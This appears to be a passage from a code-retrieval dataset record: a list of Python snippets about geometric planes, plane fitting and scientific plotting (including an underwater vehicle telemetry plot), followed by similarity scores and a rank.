'CTD_NeilBrown/depth': 'k-',\n 'Depth_MSI_US300/depth': 'm-'}\n for k, v in depth_science.items():\n try: self.plot_timeseries(k, v, axes=depth_ax)\n except: print('no {0}'.format(k))\n\n depth_engineering = {\n 'VerticalControl/smoothDepthInternal': 'r-',\n 'VerticalControl/depthCmd': 'g-',\n 'VerticalControl/depthErrorInternal': 'g:'}\n for k, v in depth_engineering.items():\n try: self.plot_timeseries(k, v, axes=depth_ax)\n except: print('no {0}'.format(k))\n # TODO only if sw debug flag is set \n depth_rate_engineering = {\n 'VerticalControl/depthRateCmd': 'gray',\n 'VerticalControl/depth_rate': 'gray', # XXX why same color?\n }\n for k, v in depth_rate_engineering.items():\n try: \n self.plot_timeseries(k, vi, axes=depth_ax, \n convert=oalib.make_multiplier(100))\n except: print('no {0}'.format(k))\n ### add to pitch axes ###\n pitch_engineering = {\n 'AHRS_sp3003D/platform_pitch_angle': 'k-', \n 'DVL_micro/platform_pitch_angle': 'm-',\n 'AHRS_3DMGX3/platform_pitch_angle': 'c-',\n 'InternalSim/platform_pitch_angle': ':r',\n }\n for k, v in pitch_engineering.items():\n try: self.plot_timeseries(k, v, axes=pitch_ax)\n except: print('no {0}'.format(k))\n ### add to mass axes ###\n mass_engineering = {\n 'VerticalControl/massPositionAction': 'g-', \n 'VerticalControl/massIntegralInternal': 'c-',\n 'MassServo/platform_mass_position': 'r-',\n #'VerticalControl/massPitchErrorInternal': ':r',\n }\n for k, v in mass_engineering.items():\n try: self.plot_timeseries(k, v, axes=mass_ax)\n except: print('no {0}'.format(k))\n ### add to buoyancy axes ###\n buoyancy_engineering = {\n 'VerticalControl/buoyancyAction': 'm-',\n 'BuoyancyServo/platform_buoyancy_position': 'b-',\n }\n for k, v in buoyancy_engineering.items():\n try: \n self.plot_timeseries(k, v,\n# convert=oalib.make_multiplier(-10), \n axes=buoyancy_ax)\n except: print('no {0}'.format(k))\n ### add to control surface axes ###\n control_surface_engineering = {\n 'VerticalControl/elevatorAngleAction': 'm-', \n 'VerticalControl/elevatorIntegralInternal': 'm:',\n 'ElevatorServo/platform_elevator_angle': 'c-',\n }\n for k, v in control_surface_engineering.items():\n try: \n 
self.plot_timeseries(k, v, convert = np.rad2deg, \n axes=control_surface_ax)\n except: print('no {0}'.format(k))\n \n\n # TODO only if supporting data is requested\n ### add other supporting data ###\n try: self.plot_timeseries('CTD_NeilBrown/depth', 'k-', axes=depth_ax)\n except: print('no CTD_NeilBrown/depth')\n try: self.plot_timeseries('Depth_MSI_US300', 'm-', axes=depth_ax)\n except: print('no Depth_MSI_US300')\n\n\n ### print additional information ###\n buoyancyNeutral = ('Config/Control/buoyancyNeutral',\n 'Config/Servo/buoyancyNeutral')\n for s in buoyancyNeutral:\n try:\n print('{0} = {1} {2}'.format(s, self[s+'/value'], self[s+'/units']))\n except:\n print('{0} not found'.format(s))\n \n# VertMd(0=N/A,1=Surf,2=Dep,3=DepRt,4=Pit0,5=Pit,6=PitRt,7=M&E,8=Flt),\n# VertHoldMd(0=N/A,1=Ms,2=El,3=Both)\n try:\n v, t = self.timeseries('VerticalControl/verticalMode')\n oalib.plot_date_blocks(t, v, axes=control_mode_ax, colormap=mpl.cm.jet)\n except: print('VerticalControl/verticalMode not found')\n\n depth_ax.invert_yaxis()\n for ax in fig.get_axes():\n ax.grid(True)\n try:\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5),\n fontsize='small')\n except:\n print('uncaught exception for legend...')\n for ax in fig.get_axes()[:-1]:\n plt.setp(ax.get_xticklabels(), visible=False)\n\n depth_ax.set_title(os.path.basename(self.filename))\n control_mode_ax.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M'))\n plt.setp(control_mode_ax.get_xticklabels(), rotation=30,\n fontsize='small')", "def test_create(self):\n f = azplugins.restrain.plane(group=hoomd.group.all(), point=(0,0,0), normal=(1,0,0), k=2.0)\n\n f.set_params(k=5.0)\n f.set_params(k=8)\n\n f.set_params(point=(0,0,1))\n f.set_params(point=[0,0,1])\n f.set_params(point=np.array([0,0,1]))\n\n f.set_params(normal=(0,0,1))\n f.set_params(normal=[0,0,1])\n f.set_params(normal=np.array([0,0,1]))\n\n f.set_params(point=(0,0,0), normal=(1,0,0), k=10.0)", "def add_plane(self, plane):\n self.__plane_list.append(plane)", "def get_plane(\n self,\n pos=None,\n norm=None,\n plane=None,\n sx=None,\n sy=None,\n color=\"lightgray\",\n alpha=0.25,\n **kwargs,\n ):\n axes_pairs = dict(sagittal=(0, 1), horizontal=(2, 0), frontal=(2, 1))\n\n if pos is None:\n pos = self.root._mesh.centerOfMass()\n\n try:\n norm = norm or self.space.plane_normals[plane]\n except KeyError: # pragma: no cover\n raise ValueError( # pragma: no cover\n f\"Could not find normals for plane {plane}. 
Atlas space provides these normals: {self.space.plane_normals}\" # pragma: no cover\n )\n\n # Get plane width and height\n idx_pair = (\n axes_pairs[plane]\n if plane is not None\n else axes_pairs[\"horizontal\"]\n )\n\n bounds = self.root.bounds()\n root_bounds = [\n [bounds[0], bounds[1]],\n [bounds[2], bounds[3]],\n [bounds[4], bounds[5]],\n ]\n\n wh = [float(np.diff(root_bounds[i])) for i in idx_pair]\n if sx is None:\n sx = wh[0]\n if sy is None:\n sy = wh[1]\n\n # return plane\n return Actor(\n Plane(pos=pos, normal=norm, sx=sx, sy=sy, c=color, alpha=alpha),\n name=f\"Plane at {pos} norm: {norm}\",\n br_class=\"plane\",\n )", "def __init__(self, planes, cosmology):\r\n self.planes = planes\r\n self.plane_redshifts = [plane.redshift for plane in planes]\r\n self.cosmology = cosmology", "def plane_list(self, new_list):\n self.__plane_list = new_list", "def __init__(self,\n r = 1.0,\n normal = Vector(0.0,1.0,0.0),\n origin = Vector(0.0,0.0,0.0),\n orientation = Vector(1.0,0.0,0.0),\n c1 = Color(0.01,0.01,0.01),\n c2 = Color(0.99,0.99,0.99)):\n \n CheckPlane.__init__(self, normal, origin, orientation, c1, c2)\n self.origin = origin\n self.set_orientation(orientation)\n self.r = r\n self.R = r ** 2.0", "def plane_shape(self) -> typing.Tuple[int, int]:\n return self._channel_arrays[0].shape[self.y_pos], self._channel_arrays[0].shape[self.x_pos]", "def from_plane_and_radius(cls, plane, radius):\n return cls(radius, frame=Frame.from_plane(plane))", "def planeFit(self, points):\n pointsP = points\n points = np.array(points).transpose()\n points = np.reshape(points, (np.shape(points)[0], -1)) # Collapse trialing dimensions\n ctr = points.mean(axis=1)\n if points.shape[0] > points.shape[1]:\n return list(ctr), self.verticalAxis()\n x = points - ctr[:,np.newaxis]\n M = np.dot(x, x.T) # Could also use np.cov(x) here.\n return ctr, svd(M)[0][:,-1]", "def __copy__(self) -> 'Plane':\n return self.__class__(self._normal, self._distance_from_origin)", "def PlaneSubtraction(data, direction='xy', xdim=20, ydim=20):\n img = 1*data\n dy, dx = img.shape\n x = np.linspace(0, xdim, dx)\n y = np.linspace(0, ydim, dy)\n DX, DY = np.meshgrid(x, y)\n PX = []\n PY = []\n\n for i, j in zip(np.arange(dy), np.arange(dx)):\n lx = img[i]\n ly = img[:, j]\n maskx = np.isnan(lx)\n masky = np.isnan(ly)\n\n if len(lx[maskx]) < len(lx):\n s = np.polyfit(x[~maskx], lx[~maskx], 1)\n PX.append(s)\n\n if len(ly[masky]) < len(ly):\n s = np.polyfit(y[~masky], ly[~masky], 1)\n PY.append(s)\n\n px = np.nanmean(PX, axis=0)\n py = np.nanmean(PY, axis=0)\n print(\"x - slope: %.2e, y - slope: %.2e\" % (px[0], py[0]))\n print(\"calculate planes\")\n xplane = np.polyval(px, DX)\n yplane = np.polyval(py, DY)\n\n if direction == 'x':\n print('x plane subtraction')\n correction = xplane\n elif direction == 'y':\n print('y plane subtraction')\n correction = yplane\n else:\n print('x-y plane subtraction')\n correction = xplane + yplane\n\n corrected = data - correction\n corrected -= np.nanmin(corrected)\n return corrected", "def test_select_roi():\n _c = io.create_sample_Dataset(n_frames=5, rows=10, cols=10)\n _c = _c.sel(x=slice(35, 70), y=slice(30, 90))\n assert _c.u.shape == (7, 2, 5) # note the last dimension is preserved", "def figures_2d_of_planes(\r\n self,\r\n plane_index: Optional[int] = None,\r\n subtracted_image: bool = False,\r\n model_image: bool = False,\r\n plane_image: bool = False,\r\n use_source_vmax: bool = False,\r\n zoom_to_brightest: bool = True,\r\n interpolate_to_uniform: bool = False,\r\n ):\r\n\r\n visuals_2d = 
self.get_visuals_2d()\r\n\r\n visuals_2d_no_critical_caustic = self.get_visuals_2d()\r\n visuals_2d_no_critical_caustic.tangential_critical_curves = None\r\n visuals_2d_no_critical_caustic.radial_critical_curves = None\r\n visuals_2d_no_critical_caustic.tangential_caustics = None\r\n visuals_2d_no_critical_caustic.radial_caustics = None\r\n\r\n plane_indexes = self.plane_indexes_from(plane_index=plane_index)\r\n\r\n if use_source_vmax:\r\n self.mat_plot_2d.cmap.kwargs[\"vmax\"] = np.max(self.fit.model_images_of_planes_list[-1])\r\n\r\n for plane_index in plane_indexes:\r\n\r\n if subtracted_image:\r\n\r\n self.mat_plot_2d.plot_array(\r\n array=self.fit.subtracted_images_of_planes_list[plane_index],\r\n visuals_2d=visuals_2d_no_critical_caustic,\r\n auto_labels=aplt.AutoLabels(\r\n title=f\"Subtracted Image of Plane {plane_index}\",\r\n filename=f\"subtracted_image_of_plane_{plane_index}\",\r\n ),\r\n )\r\n\r\n if model_image:\r\n\r\n if self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n # Overwrite plane_index=0 so that model image uses critical curves -- improve via config cutomization\r\n\r\n visuals_2d_model_image = self.inversion_plotter_of_plane(plane_index=0).get_visuals_2d_for_data()\r\n\r\n else:\r\n\r\n visuals_2d_model_image = visuals_2d\r\n\r\n self.mat_plot_2d.plot_array(\r\n array=self.fit.model_images_of_planes_list[plane_index],\r\n visuals_2d=visuals_2d_model_image,\r\n auto_labels=aplt.AutoLabels(\r\n title=f\"Model Image of Plane {plane_index}\",\r\n filename=f\"model_image_of_plane_{plane_index}\",\r\n ),\r\n )\r\n\r\n if plane_image:\r\n\r\n if not self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n self.tracer_plotter.figures_2d_of_planes(\r\n plane_image=True,\r\n plane_index=plane_index,\r\n zoom_to_brightest=zoom_to_brightest\r\n )\r\n\r\n elif self.tracer.planes[plane_index].has(cls=aa.Pixelization):\r\n\r\n inversion_plotter = self.inversion_plotter_of_plane(\r\n plane_index=plane_index\r\n )\r\n\r\n inversion_plotter.figures_2d_of_pixelization(\r\n pixelization_index=0,\r\n reconstruction=True,\r\n zoom_to_brightest=zoom_to_brightest,\r\n interpolate_to_uniform=interpolate_to_uniform\r\n )\r\n\r\n if use_source_vmax:\r\n self.mat_plot_2d.cmap.kwargs.pop(\"vmax\")", "def edit(self, p):\n self.poses[self.selected_point].model = p\n self.calibration_changed()", "def svm_add_2d_hyperplane(model, ax, plotted_points):\n X_MIN = np.min(plotted_points[:, 0])\n X_MAX = np.max(plotted_points[:, 0])\n Y_MIN = np.min(plotted_points[:, 1])\n Y_MAX = np.max(plotted_points[:, 1])\n # plot the line, the points, and the nearest vectors to the plane\n xx, yy = np.mgrid[X_MIN:X_MAX:200j, Y_MIN:Y_MAX:200j]\n Z = model.decision_function(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n plot.contourf(xx, yy, Z, levels=np.linspace(\n Z.min(), 0, 7), cmap=plot.cm.PuBu)\n a = plot.contour(xx, yy, Z, levels=[0], linewidths=2, colors='darkred')\n plot.contourf(xx, yy, Z, levels=[0, Z.max()], colors='palevioletred')\n return a.collections[0]", "def set_active_perspective(self, name):\n self.perspective_cbox.SetStringSelection(name)\n self.enable_import()", "def is_point_on_plane(point, plane, tol=0.0):\n d = distance_point_plane(point, plane)\n return d <= tol", "def line_plane(l, p):\n d = dot((p.o - l.o), p.n) / dot(l.d, p.n)\n return l(d)", "def find_plane_eq(p1, p2, p3):\n\n p1 = np.asarray(p1)\n p2 = np.asarray(p2)\n p3 = np.asarray(p3)\n\n # These two vectors are in the plane\n v1 = p3 - p1\n v2 = p2 - p1\n\n # the cross product is a vector normal 
to the plane\n cp = np.cross(v1, v2)\n a, b, c = cp\n\n # This evaluates a * x3 + b * y3 + c * z3 which equals d\n d = np.dot(cp, p3)\n\n plane_eq = np.array([a, b, c, d])\n\n return plane_eq", "def LinePlaneIntersection(line, plane):\n plane = rhutil.coerceplane(plane, True)\n line_points = rhutil.coerce3dpointlist(line, True)\n line = Rhino.Geometry.Line(line_points[0], line_points[1])\n rc, t = Rhino.Geometry.Intersect.Intersection.LinePlane(line, plane) \n if not rc: return scriptcontext.errorhandler()\n return line.PointAt(t)", "def extract_plane_index_of_profile(self, profile_name):\r\n for plane_index, plane in enumerate(self.planes):\r\n for galaxy in plane.galaxies:\r\n if profile_name in galaxy.__dict__:\r\n return plane_index", "def get_plane_drawables(self):\n return self.plane.get_drawables()", "def setPointMode(self, mode):\n for point in self.points:\n point.mode = mode", "def plane_equation(p1, p2, p3):\n a1 = p2[0] - p1[0]\n b1 = p2[1] - p1[1]\n c1 = p2[2] - p1[2]\n a2 = p3[0] - p1[0]\n b2 = p3[1] - p1[1]\n c2 = p3[2] - p1[2]\n a = b1 * c2 - b2 * c1\n b = a2 * c1 - a1 * c2\n c = a1 * b2 - b1 * a2\n # Points are collinear\n if (abs(a) < 1e-6) and (abs(b) < 1e-6) and (abs(c) < 1e-6):\n return None\n # All clear\n d = (- a * p1[0] - b * p1[1] - c * p1[2])\n return a, b, c, d" ]
[ "0.63480055", "0.62466025", "0.6210041", "0.6181447", "0.60752785", "0.59501004", "0.5885949", "0.5844385", "0.5806675", "0.57641417", "0.5717144", "0.5657449", "0.5650415", "0.5615462", "0.5605463", "0.55464685", "0.55369604", "0.5516311", "0.5514092", "0.5510669", "0.55100155", "0.54709643", "0.54680014", "0.5427352", "0.54006386", "0.53856057", "0.53004605", "0.52668273", "0.52662754", "0.52640927", "0.526292", "0.52293146", "0.51846796", "0.5170561", "0.5167306", "0.50746065", "0.5074228", "0.5073328", "0.5064726", "0.5062183", "0.50609356", "0.50515", "0.49915475", "0.4983672", "0.4974672", "0.4962033", "0.4956949", "0.4956472", "0.49249968", "0.49089128", "0.48954904", "0.4873187", "0.4848546", "0.48300007", "0.48166892", "0.48024854", "0.4781594", "0.47592798", "0.47518408", "0.47489858", "0.47457308", "0.4742431", "0.47273412", "0.47220972", "0.47100902", "0.47099572", "0.46993428", "0.46972233", "0.46960855", "0.46931955", "0.4683895", "0.46563375", "0.46513733", "0.46467516", "0.46449706", "0.4641277", "0.4625659", "0.46240544", "0.46228787", "0.46194848", "0.46194193", "0.46173668", "0.4616275", "0.46157056", "0.4611305", "0.4607152", "0.46022305", "0.45979962", "0.45763144", "0.4567697", "0.45661473", "0.4545085", "0.45436013", "0.45406672", "0.45380822", "0.453247", "0.45319444", "0.45250157", "0.45213696", "0.45174584" ]
0.5889004
6
Identity function for string extraction.
def _(x): return x
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def intern(string): # real signature unknown; restored from __doc__\n return \"\"", "def identity_tokenizer(text):\n return text", "def identity( arg ):\n return arg", "def identification(self):\n return remove_whitespace(self.str_without_type())", "def test_identity(self):\n\n s = r\"|wthis|Xis|gis|Ma|C|complex|*string\"\n\n self.assertEqual(irc.parse_irc_to_ansi(irc.parse_ansi_to_irc(s)), s)", "def getIdentity():\n return Sentience.__IDENTITY.lower()", "def identity(value):\n return value", "def check_identity(input_string: str) -> str:\n n = input_string[2]\n if n == '6':\n return 'a foreigner with nationality'\n elif n == '7':\n return 'a national without household registration'\n elif n == '8':\n return 'from Hong Kong or Macau'\n elif n == '9':\n return 'from China'\n elif n == '0' \\\n or n == '1' \\\n or n == '2' \\\n or n == '3' \\\n or n == '4' \\\n or n == '5':\n return 'a normal national'\n else:\n # Should not happen\n return None", "def make_ident(text, sep='_'):\n return _RE_NO_IDENT_CHARS.sub(sep, text)", "def _str2id(text):\n return sha1(text).hexdigest()", "def tokenize(*args, **kwargs):\n if kwargs.pop('pure', False):\n return base.tokenize(*args)\n else:\n return str(uuid.uuid4())", "def identity():\n # We generate a name, an address, add them together and return that\n name = full_name()\n place_of_residence = address()\n new_identity = name + \", \" + place_of_residence\n return new_identity", "def _extract_identifier(self, publication):\n return self._parse_identifier(publication.metadata.identifier)", "def get_identifier(self):", "def get_string2(self):\n pass", "def string_id(self):\n id = self.id()\n if not isinstance(id, basestring):\n id = None\n return id", "def do(s):\r\n return get_AA_subs(generate_mutString(s))", "def fetch_current_user_id(s):", "def identity(x):\n return x", "def identity(x):\n return x", "def identity(x):\n return x", "def _identifier(self):\n identifier = self._get_next_symbol()\n\n while True:\n symbol = self._get_next_symbol()\n if symbol != None and symbol.isalnum():\n identifier += symbol\n else:\n if symbol != None:\n self._back()\n break\n\n return self._create_identifier_token(identifier)", "def autoid(self) -> str:", "def autoid(self) -> str:", "def identity(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity\")", "def identity(*args):\n return args if len(args) > 1 else args[0]", "def test_transform(self):\n t = Identity()\n assert t.transform(\"yo\") == \"yo\"", "def identifier():\n return (atomic() | hierarchical_identifier()).expect('identifier')", "def ident(self):\r\n text = self.component.get(\"id\", \"\")\r\n # strip surrounding curly braces from id\r\n return re.sub(\"[{}]\", \"\", text)", "def identifier(self):\n _id = ''\n while self.current_char is not None and self.current_char.isalpha():\n # inner loop to get alphanumeric characters\n while self.current_char is not None and\\\n self.current_char.isalnum():\n _id += self.current_char\n self.advance()\n return Token(self.tokentype['ID'], _id)", "def extract(self, id_str):\n if id_str == \"\" or id_str == None:\n raise InvalidIdentityString(\"Invalid user identity string\")\n\n id_mpz = str_to_mpz(id_str)\n a = hash_mpz(id_mpz, self.f)\n a_tmp = 0\n\n while gmpy2.jacobi(a_tmp, self.n) != 1:\n a_tmp = hash_mpz(a_tmp, self.f)\n a = a_tmp\n\n logging.debug(f\"Jacobi (a/n) = {gmpy2.jacobi(a, self.n)}\")\n logging.debug(f\"Jacobi (-a/n) = {gmpy2.jacobi(-a, self.n)}\")\n \n r = pow(a, (self.n + 5 - (self.p+self.q)) // 8, self.n)\n r2 = (r*r) % 
self.n\n\n logging.debug(f\"a = {a % self.n}\")\n logging.debug(f\"-a = {-a %self.n}\")\n logging.debug(f\"r = {r}\")\n logging.debug(f\"r**2 = {r2}\")\n\n if r2 != (a % self.n) and r2 != (-a % self.n):\n raise ExtractFailure(\n \"Error deriving r: r^2 != a (mod n) and r^2 != -a (mod n)!\")\n return (r, a)", "def test_replace_identity(self):\n pass", "def identifier(self):", "def get_unc_i(self):\n return self.unci", "def get_processed_string(self, input_string):\n if input_string[:6] == '[sic]\"':\n return input_string[6: -1]\n else:\n return input_string.format(**self)", "def t_STR_LITER(t):\n return t", "def format_mapping_identifier(string):\n\n if not isinstance(string, str):\n helper_logger.log_warning(\n \"Error: mapping identifier is not a string {}\".format(string))\n return\n\n\n # create a working copy (and make it lowercase, while we're at it)\n s = string.lower()\n\n # remove leading and trailing whitespace\n s = s.strip()\n\n # Replace whitespace with underscores\n # Make spaces into underscores\n s = re.sub(r'\\s+', '_', s)\n\n return s", "def insertable(m) -> str:\n return m[0]", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum() or self.current_char == '_':\n result += self.current_char\n self.advance()\n\n return Token(ID, result)", "def test_glass_str__returns_uid():\n glass = moet.create_glass(\"A\")\n assert str(glass) == glass.uid", "def _magic_s(self, s):\n if idapy._d is None:\n print \"Please select a dump first. Example:\"\n print \"sel t2i\"\n return\n idapy._d.strings(s)", "def _sanitize_string(self, string):\n # get the type of a unicode string\n unicode_type = type(Pyasciigraph._u('t'))\n input_type = type(string)\n if input_type is str:\n if sys.version < '3':\n info = unicode(string)\n else:\n info = string\n elif input_type is unicode_type:\n info = string\n elif input_type is int or input_type is float:\n if sys.version < '3':\n info = unicode(string)\n else:\n info = str(string)\n else:\n info = str(string)\n return info", "def process(self, s: str) -> str:\n raise NotImplementedError(\"must be implemented by subclasses\")", "def main():\n\tprint 'Introduce string: '\n\ts = raw_input()\n\treturn if_unique_chars_one(s)", "def extract(string, start_marker, end_marker):\n start_loc = string.find(start_marker)\n end_loc = string.find(end_marker)\n if start_loc == -1 or end_loc == -1:\n return \"\"\n return string[start_loc+len(start_marker):end_loc]", "def get_identifier_string(self):\n return self.identifier", "def name2Id(self, classExpression):\n out = classExpression\n name_id = self.gen_name_id()\n for k, v in name_id.items():\n out = re.sub(\"\\'\"+k+\"\\'\", v, out) # Suspect this not Pythonic. Could probably be done with a fancy map lambda combo. 
\n return out", "def stringfilter(func):\n @wraps(func)\n def _dec(*args, **kwargs):\n if args:\n args = list(args)\n args[0] = str(args[0])\n return func(*args, **kwargs)\n\n return _dec", "def get_firmware_id_string(self):\n unpacked_string = False\n # Find the address of the string in memory\n id_string_addr = self._get_slt_entry(3)\n if id_string_addr is None:\n # maybe it's not packed in this slt\n id_string_addr = self._get_slt_entry(2)\n if id_string_addr is None:\n # Can't find it in the slt return None\n return None\n unpacked_string = True\n # parse the null terminated string\n last = build_string = \"\"\n # There is no reason for the build string to contain\n # any non ASCII character but do it like this to avoid\n # breaking support for Python 2.7\n try:\n char = unichr\n except NameError:\n char = chr\n while last != \"\\0\":\n word = self.get_data(id_string_addr)\n if unpacked_string:\n if Arch.addr_per_word == 4:\n # Two char per word\n build_string += char(word & 0x00FFFF)\n if build_string[-1] == \"\\0\":\n break\n last = char((word & 0xFFFF0000) >> 16)\n build_string += last\n else:\n # Only one char per word\n last = char(word)\n build_string += last\n else:\n # Four chars per word\n if Arch.addr_per_word == 4:\n string = cu.get_string_from_word(Arch.addr_per_word, word)\n stop_decoding = False\n for char in string:\n if char != '\\0':\n build_string += char\n else:\n stop_decoding = True\n break\n last = string[3:]\n\n if stop_decoding:\n break\n else:\n # Two chars per word\n build_string += char((word & 0xFF00) >> 8)\n if build_string[-1] == \"\\0\":\n break\n last = char(word & 0x00FF)\n build_string += last\n # Move to the next word in the string\n id_string_addr += Arch.addr_per_word\n\n # remove the \\0 we don't want the terminator\n if build_string[-1] == \"\\0\":\n build_string = build_string[:-1]\n\n return build_string.strip()", "def identification(self):\n return remove_whitespace(str(self))", "def makeIdentity(self) -> None:\n ...", "def _sanitize_to_identifer(name):\n n = name.strip()\n n = re.sub('/', ' ', n)\n n = re.sub('-', ' ', n)\n n = re.sub(' +', '_', n)\n n = re.sub('[\\W]+', '', n)\n return n", "def inner_map_function(s):\n\n return f(inner_strip(s))", "def __getitem__(self, *args):\n return _libsbml.string___getitem__(self, *args)", "def value(self, p_str, p_str_1=None): # real signature unknown; restored from __doc__ with multiple overloads\n return \"\"", "def process_string(string: str) -> str:\n\n return string if string else Presenter.DEFAULT", "def _findIdentifierValue (self, identifier : String) -> String:\n\n Logging.trace(\">>: %s\", identifier)\n cls = self.__class__\n\n if identifier not in self._keyToValueMap:\n # leave identifier as is (it might be some value name like\n # wahr or false\n Logging.traceError(\"no expansion found\")\n result = identifier\n else:\n result = self._keyToValueMap[identifier]\n\n if not isString(result):\n result = repr(result)\n else:\n result = (cls._doubleQuoteCharacter + result\n + cls._doubleQuoteCharacter)\n\n Logging.trace(\"<<: expanded %s into %r\", identifier, result)\n return result", "def as_identifier(self, string):\n t = string.lower()\n\n if t in self.keywords:\n return idaapi.COLSTR(string, idaapi.SCOLOR_ASMDIR)\n\n elif t in self.statements:\n return idaapi.COLSTR(string, idaapi.SCOLOR_LOCNAME)\n\n elif t in self.types:\n return idaapi.COLSTR(string, idaapi.SCOLOR_IMPNAME)\n\n else:\n return string", "def to_identifier(val: Any):\n val = str(val).strip()\n # Replaces spaces, dashes, and 
slashes to underscores\n val = re.sub(r\"[\\s\\-/\\\\]\", \"_\", val)\n # Remove remaining invalid characters\n val = re.sub(r\"[^0-9a-zA-Z_]\", \"\", val)\n # Identifier can't start with digits\n val = re.sub(r\"^[^a-zA-Z_]+\", \"\", val)\n\n if not val or iskeyword(val):\n raise ValueError(f\"Unable to convert to identifier: {val}\")\n\n return val", "def prepare_input(self, extracted_str):\n\n # Remove withspace\n if self.options['remove_whitespace']:\n optimized_str = re.sub(' +', '', extracted_str)\n else:\n optimized_str = extracted_str\n \n # Remove accents\n if self.options['remove_accents']:\n optimized_str = unidecode(optimized_str)\n\n # specific replace\n for replace in self.options['replace']:\n assert len(replace) == 2, 'A replace should be a list of 2 items'\n optimized_str = optimized_str.replace(replace[0], replace[1])\n\n return optimized_str", "def _ident(name: Optional[Union[quoted_name, str]]) -> Optional[str]:\n if name is None:\n return name\n elif isinstance(name, quoted_name):\n return str(name)\n elif isinstance(name, str):\n return name", "def func(str):\n\treturn str.split()", "def reference_to_id(value):\n m = re.search(r\"<@(U[A-Z0-9]+)>\", value)\n return m.group(1) if m else None", "def id_(x: Any) -> Any:\n return x", "def to_input(x):\n return '_'.join([x.split('_')[0], 'Input'])", "def test_process_string():\n decode = StringProcessor()\n assert decode.process_string(\"ab\") == \"\"\n decode.output = \"\"\n\n assert decode.process_string(\"ab*\") == \"b\"\n decode.output = \"\"\n\n assert decode.process_string(\"ab^\") == \"ba\"\n decode.output = \"\"\n\n assert decode.process_string(\"^\") == \"\"", "def parse_id(string):\n return string.split('/')[-1]", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum():\n result += self.current_char\n self.advance()\n\n if self.current_char == '(' and self.is_declaration is False:\n self.advance()\n token = self.RESERVED_KEYWORDS.get(\n result.upper(), Token(CALL, result))\n else:\n token = self.RESERVED_KEYWORDS.get(\n result.upper(), Token(ID, result))\n self.is_declaration = False\n if token.type in (PROCEDURE, FUNCTION):\n self.is_declaration = True\n return token", "def _transform_identifier(self, identifier, scheme):\n urlize = self.context.get(\"urlize_identifiers\", True)\n prefix_scheme = self.context.get(\"prefix_identifier_schemes\", True)\n result = None\n\n if urlize:\n result = idutils.to_url(identifier, scheme, url_scheme=\"https\")\n\n if not result and prefix_scheme and not identifier.startswith(scheme):\n result = f\"{scheme}:{identifier}\"\n\n return result or identifier", "def identify(func):\n def identified(arg):\n func(arg)\n return arg\n return identified", "def unique_id() -> str:", "def PrepareIdentifier (s, in_use, aux_keywords=frozenset(), private=False, protected=False):\n s = DeconflictKeyword(MakeIdentifier(s).strip('_'), aux_keywords)\n if private:\n s = '__' + s\n elif protected:\n s = '_' + s\n return MakeUnique(s, in_use)", "def test_graphid_str():\n id1 = _ir.GraphId(\"g1\")\n assert id1.str() == \"g1\"\n id2 = _ir.GraphId(\"foobar\")\n assert id2.str() == \"foobar\"", "def str2nopunc(x):\n if isinstance(x,str):\n y = re.sub(r'[^\\w\\s]','',x.lower().strip()).replace('_','')\n else:\n y = x\n return y", "def get_str(self, idx):\n if idx not in self.id2Str:\n return None\n else:\n return self.id2Str[idx]", "def eidr_identifier(title):\n pass", "def unpack_id(self, bytes_string, offset=0):\r\n return 
self._packer.unpack_from(bytes_string, offset)", "def strip_action_str(string: str) -> str:", "def parse(s):\n return s", "def _tokenize4map(param):\n return _tokenize(*param)", "def _decompose(cls,\n s = '',\n element = False):\n\n s = s.strip()\n\n x = cls._html.findall(s)\n if len(x) > 0:\n s = ''.join(x[0][::-1])\n\n s = cls._translate.get(s.lower(), s)\n\n name = s.strip()\n n = len(name)\n el = ''\n a = ''\n e = ''\n\n # get numbers\n n = re.findall(\"\\d+\", name)\n\n # get strings\n cx = re.findall(\"\\D+\", name)\n\n c = []\n for x in cx:\n xx = x.split('-')\n cy = [y for y in xx if y != '']\n c += cy\n if len(c) == 2:\n if c[0] in ('m', 'g'):\n c = c[::-1]\n if c[0][0] == '*':\n c = c[::-1]\n if len(n) > 0: a = n[0]\n if len(n) > 1: e = n[1]\n if len(n) > 2: raise ValueError(\"Can't understand isotope '{}'.\".format(s))\n if len(c) > 0: el = c[0]\n if len(el) > 0:\n if el[-1] in cls.EXCITE and len(c) == 1 and len(n) == 2:\n c.append(el[-1])\n el = el[:-1]\n if len(c) == 2 and c == ['(', ')']:\n if len(n) == 1:\n a = n[0]\n el = 'Z='\n e = ''\n c = []\n n = []\n else:\n return (s,) + ('',)*3\n if len(c) == 2:\n if c[1] in ('g', 'G'):\n e = '0'\n if len(n) > 1:\n return (s,) + ('',)*3\n elif c[1] in ('m', 'M') and len(n) == 1:\n e = '1'\n elif c[1][0] == '*' and len(n) == 1:\n e = str(len(c[1]))\n assert c[1].count('*') == len(c[1])\n if e == '1':\n e = str(cls.EANY)\n if not c[1] in ('m', 'g', 'M', 'G') and not c[1][0] == '*':\n return (s,) + ('',)*3\n\n if len(c) == 1 and c[0][-1] == '*':\n e = 0\n while c[0][-1] == '*':\n c[0] = c[0][:-1]\n e += 1\n assert e == 1\n e = str(e)\n el = c[0]\n\n if len(c) == 1 and c[0][0] == '*':\n e = 0\n while c[0][0] == '*':\n c[0] = c[0][1:]\n e += 1\n assert e == 1\n e = str(e)\n el = c[0]\n\n if s == 'a' and a == '':\n el = 'He'\n a = '4'\n # this is a possible conflict with potassium\n elif (element) and s == 'p':\n el = 'P'\n elif s == 'p':\n el = 'H'\n a = '1'\n elif el in ('p', 'pn') and a == '1':\n el = 'H'\n elif s == 'pn':\n el = 'H'\n a = ''\n elif el in ('d', 'D'):\n el = 'H'\n if not a in ('', '2'):\n raise AttributeError('\"d\" already implies mass; if supplied needs to be \"2\".')\n a = '2'\n elif el in ('t','T'):\n el = 'H'\n if not a in ('', '3'):\n raise AttributeError('\"t\" already implies mass; if supplied needs to be \"3\"')\n a = '3'\n elif (element) and s == 'n':\n el = 'N'\n elif s == 'n':\n el = 'nt'\n a = '1'\n elif el in ('n', 'nt') and a == '1':\n el = 'nt'\n elif s in 